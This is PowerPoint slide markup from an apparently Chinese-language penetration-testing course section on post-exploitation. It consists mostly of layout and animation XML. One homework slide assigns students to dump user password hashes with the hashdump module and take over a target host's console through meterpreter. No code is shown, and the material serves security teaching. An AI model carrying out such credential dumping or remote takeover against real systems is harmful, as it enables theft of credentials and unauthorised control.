              <a:ext cx="3636897" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="文本框 576"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="5193635"/>
              <a:ext cx="2011680" cy="460637"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>教师综合评价</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="文本框 577"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="5210848"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目评价】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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22" name="矩形 21"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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23" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.6 后渗透攻击</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="9" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="13" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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 name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【作业布置】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466215" y="2047240"/>
            <a:ext cx="7965440" cy="2553335"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.使用hashdump模块来提取系统的用户名和密码哈希值。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="4000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.利用meterperter相关命令来获取目标主机控制台。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="4000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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7" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.6 后渗透攻击</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide3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TextBox 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1354455" y="2427605"/>
            <a:ext cx="9048750" cy="7385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spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" spc="-300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="LilyUPC" panose="020B0604020202020204" pitchFamily="34" charset="-34"/>
                <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>本章内容结束</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" spc="-300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="LilyUPC" panose="020B0604020202020204" pitchFamily="34" charset="-34"/>
              <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9500870" y="5334000"/>
            <a:ext cx="2261870" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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8" presetClass="entr" presetSubtype="0" accel="50000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="50000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="-45.0"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="114"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="-45"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="69900">
                                          <p:val>
                                            <p:fltVal val="45"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="39" decel="50000" autoRev="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="114"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="34" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="216"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>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 grpId="0"/>
    </p:bld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a:xfrm>
            <a:off x="533756" y="1946091"/>
            <a:ext cx="4302496" cy="638783"/>
            <a:chOff x="6627851" y="1754191"/>
            <a:chExt cx="4302496" cy="638783"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
